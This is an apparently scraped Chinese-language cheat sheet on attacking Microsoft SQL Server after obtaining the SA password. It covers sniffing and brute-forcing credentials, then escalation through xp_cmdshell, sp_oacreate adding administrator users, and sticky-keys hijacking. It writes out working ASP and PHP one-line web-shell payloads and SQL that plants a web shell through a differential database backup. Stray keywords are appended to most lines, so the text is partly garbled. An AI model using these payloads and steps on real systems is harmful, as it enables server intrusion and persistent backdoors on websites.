一、SA口令的獲取php
webshell或源代碼的獲取web
源代碼泄露sql
嗅探(用CAIN等工具嗅探1433數據庫端口)shell
口令暴力破解數據庫
二、常見SQL server 提權命令服務器
查看數據庫的版本(select @@version;)app
查看數據庫所在服務器操做系統的參數函數
查看數據庫啓動的參數工具
查看數據庫啓動的時間網站
查看數據庫服務器名和實例名
查看用戶登陸信息
查看數據庫裏所全部的存儲工程和函數
查看數據庫裏用戶和進程的信息
恢復存儲過程
開啓和關閉xp_cmdshell
xp_cmdshell執行命令
開啓和關閉sp_oacreate
sp_oacreate刪除文件
sp_oacreate複製文件
sp_oacreate移動文件
sp_oacreate添加管理員用戶
開啓和關閉sp_makeweblask\
wscript.shell執行命令
shell.applocation執行命令
開啓和關閉openrowset
沙盒執行命令
註冊表劫持粘貼鍵
sp_oacreate替換粘貼鍵
public提權操做
echo一句話後門(echo <%eval request(cmd)%> >d:\wwwroot\ok.asp echo <? php @eval($_POST[cmd]);?> >cmd.php)
在mssql 中查詢password
三、經過數據庫備份獲取webshell
差別備份一句話木馬
backup database [當前數據庫名] to disk = 'c:\recycler\1.bak'
create table cmd (a image);
insert into cmd(a) values ('<%eval request("cmd")%>');
backup database [當前數據庫名] to disk = '網站絕對路徑' WITH DIFFERENTIAL,FORMAT--
LOG 備份一句話木馬(......)